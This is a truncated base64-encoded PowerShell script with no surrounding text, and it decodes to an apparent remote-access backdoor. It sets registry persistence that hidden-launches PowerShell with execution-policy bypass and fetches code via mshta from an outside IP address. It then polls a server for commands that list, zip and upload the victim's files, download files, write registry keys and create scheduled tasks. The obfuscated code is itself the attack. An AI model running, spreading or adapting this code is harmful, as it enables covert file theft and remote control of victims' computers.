AtAE4AYQBtAGUAIABKAFEAUQB3AEUAIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAANAA3ADQANAA2ADUAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADkAMwAuADEAOAAxAC4AMgA0ADkALwBjAG8AbgB0AHIAbwBsAC8AaAB0AG0AbAAvADEALgBoAHQAbQBsACcAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7AH0AZgB1AG4AYwB0AGkAbwBuACAAZgBwAEIAYgAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJABsAG8AbwBBAE0ASQBtAEkASwApAHsAJABUAEEAQwBLAHMAWABWAE4AcwBTACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGwAbwBvAEEATQBJAG0ASQBLACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABUAEEAQwBLAHMAWABWAE4AcwBTAC4ATABlAG4AZwB0AGgAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAFQAQQBDAEsAcwBYAFYATgBzAFMALAAgADAALAAgACQAVABBAEMASwBzAFgAVgBOAHMAUwAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwByAGUAdAB1AHIAbgAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAdgBTAGwAbwBiAFYAbAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYALAAgACQARABiAEMALAAgACQAeABQAGIAdwBqAHQAUwBhAHAAVABJAEIAKQB7ACQAVABpAG0AZQBvAHUAdAA9ADEAMAAwADAAMAAwADAAMAA7ACQAQwBSAEwARgAgAD0AIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEQAKQAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEEAKQA7ACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgAD0AIAAnAC0ALQAnADsAJABCAG8AdQBuAGQAYQByAHkAIAA9ACAAJwAqACoAKgAqACoAJwA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBSAGUAYQBkACgAJAByAE8AdQBNAEYAKQA7ACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEALAAwACwAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAApACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAFQAaQBtAGUAbwB1AHQAIAA9ACAAJABUAGkAbQBlAG8AdQB0ADsAJABnAFIATABRAGEAdABHAG8AaQBpAGYAZABVAFQALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVACAAPQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAkAGgAZQBhAGQAaQBuAGcAMQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAQwBSAEwARgApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQARABiAEMAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AFAAYgB3AGoAdABTAGEAcABUAEkAQgAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADMALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAzAC4ATABlAG4AZwB0AGgAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABDAFYAUgBxAHcAdQBmAEEAZABDAE4AcQAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9ACQAcwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABoAFUAYgBVAFcAawBaAGIAWAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAcgBPAHUATQBGACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAAPQAgAGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACcAJwA7AEkAZgAgACgAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAIAAtAG4AZQAgACcAJwApAHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAD0AJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEALgBMAGUAbgBnAHQAaAAgAC0AIAAyACkAOwAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAKQApADsAaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACkAewBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAKQB7ACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUAAgACsAIAAnAC4AYwBzAHYAJwA7AEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQACAAKwAgACcALgB6AGkAcAAnADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGQAaQByACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAPQAgACcAXwBmAGkAbABlACcAOwAkAG4AbwB3AHQAaQBtAGUAIAA9ACAARwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkALQBNAE0ALQBkAGQAXwBIAEgAXwBtAG0AXwBzAHMAOwAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABuAG8AdwB0AGkAbQBlACAAKwAgACcAXwBmAGkAbABlACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AGgAVQBiAFUAVwBrAFoAYgBYACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEARABCAG8AOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwB0AGEAcwBrADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAE